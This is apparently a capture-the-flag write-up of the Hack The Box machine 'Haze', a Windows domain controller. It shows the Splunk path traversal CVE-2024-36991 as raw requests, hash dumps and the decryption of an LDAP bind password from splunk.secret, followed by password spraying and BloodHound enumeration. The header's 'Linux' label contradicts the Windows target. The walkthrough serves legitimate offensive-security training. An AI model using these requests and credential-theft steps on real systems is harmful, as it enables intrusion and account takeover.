🧠 HTB Write-Up: Haze
Difficulty: Hard
OS: Linux
Points: 30
Date: 2025-04-07
🔍 Reconnaissance
🔎 Nmap Scan Results
Command Used:
nmap -sV -sC 10.xx.xx.xx -v
Target Host: 10.xx.xx.xx (dc01.haze.htb)
Host OS: Likely Windows Server (Domain Controller)
🟢 Open Ports and Services:
| Port | Service | Version / Notes |
|---|---|---|
| 53 | DNS | Simple DNS Plus |
| 88 | Kerberos-sec | Microsoft Windows Kerberos |
| 135 | MSRPC | Remote Procedure Call |
| 139 | NetBIOS-SSN | SMB legacy support |
| 389 | LDAP | AD LDAP (Domain: haze.htb) |
| 445 | Microsoft-DS | SMB - Likely Active Directory |
| 464 | kpasswd5? | Kerberos Password Change |
| 593 | ncacn_http | RPC over HTTP |
| 636 | LDAPS | Secure LDAP (AD) |
| 3268 | LDAP GC | AD Global Catalog |
| 3269 | LDAPS GC | Secure Global Catalog |
| 8000 | HTTP | Splunk Web Interface (login page) |
| 8088 | HTTPS | Splunkd (API endpoint) |
| 8089 | HTTPS | Splunkd (Mgmt/Service endpoint) |
🧠 Observations:
-
This host is a Windows Active Directory Domain Controller (
dc01.haze.htb) -
Multiple LDAP/Kerberos services confirm AD environment
-
Splunk appears to be running on ports
8000,8088, and8089 -
Identified Splunk Version 9.2.1 via port
8089:
🌐 Enumeration
🔹 Interface Access
- Navigated to:
http://haze.htb:8000→ Splunk Web Login Page - Splunk Management available on:
https://haze.htb:8088https://haze.htb:8089
⚠️ Vulnerability Identified
-
CVE-2024-36991 – Path Traversal in Splunk
- Affects versions < 9.2.2 (Windows)
- Exploitable via
/modules/messaging/endpoint - Allows arbitrary file read on the host
📸 PoC Search on GitHub:
🧪 Exploit Usage
python CVE-2024-36991.py -u http://haze.htb:8000/
[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:[email protected]:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::[email protected]:user:[email protected]:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:[email protected]:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:[email protected]:::20152
👥 Extracted Usernames (from Splunk config)
From the Splunk path traversal exploit output, the following potential user accounts were identified:
🛠️ Continued Exploitation – Splunk File Reads
Since the password hashes could not be cracked, the next logical step was to modify the CVE-2024-36991 exploit to read other sensitive files.
📄 Target: Splunk Configuration File
Goal: Identify Splunk’s installation path and pivot to read additional files.
Exploitation Path Used:
.../Program%20Files/Splunk/etc/splunk-launch.conf
📄 Read: splunk-launch.conf
File Content:
# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.
SPLUNK_HOME=C:\Program Files\Splunk
# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk
# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd
PYTHONHTTPSVERIFY=0
PYTHONUTF8=1
📄 Read: authentication.conf
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
Key Findings:
-
LDAP Auth Enabled (
authType = LDAP) -
Bind DN:
CN=Paul Taylor,CN=Users,DC=haze,DC=htb -
Encrypted Password
📄 Read: splunk.secret
To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.
Request Used:
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
📌 Tool Required to Decrypt:
splunksecrets by HurricaneLabs
🔓 Decrypted LDAP Password – Paul Taylor
After retrieving both the encrypted password from authentication.conf and the splunk.secret master key, we successfully decrypted the LDAP credentials for Paul Taylor.
🔐 Ciphertext (from authentication.conf)
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
#### 🧰 Tool Used
- [`splunksecrets`](https://github.com/HurricaneLabs/splunksecrets)
#### 🧪 Command Executed
splunksecrets splunk-decrypt -S splunk.secret
✅ Decrypted Result
Ld@p_Auth_Sp1unk@2k24
🎯 Initial Foothold
Used crackmapexec to test the credentials against SMB on the domain controller.
Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.xx.xx.xx 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Confirmed: Credentials are valid for domain user paul.taylor
After confirming access with paul.taylor, we performed RID brute-force enumeration against the Domain Controller to enumerate valid users.
🧪 Command:
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'
500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$
You can see that there are several other users
After identifying additional domain users via RID brute-force, we performed password spraying to test for reused credentials.
🧪 Command:
crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
Note: users.txt contains:
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
✅ Successful Login:
SMB 10.xx.xx.xx 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
🕵️ Domain Recon – BloodHound Enumeration
After gaining valid domain credentials (mark.adams), we used BloodHound to enumerate Active Directory objects and relationships.
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.xx.xx.xx -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 202504_bloodhound.zip
🧠 Key Takeaways:
-
Successfully retrieved data from the domain controller (
dc01.haze.htb) -
Output saved as a ZIP file for analysis in BloodHound GUI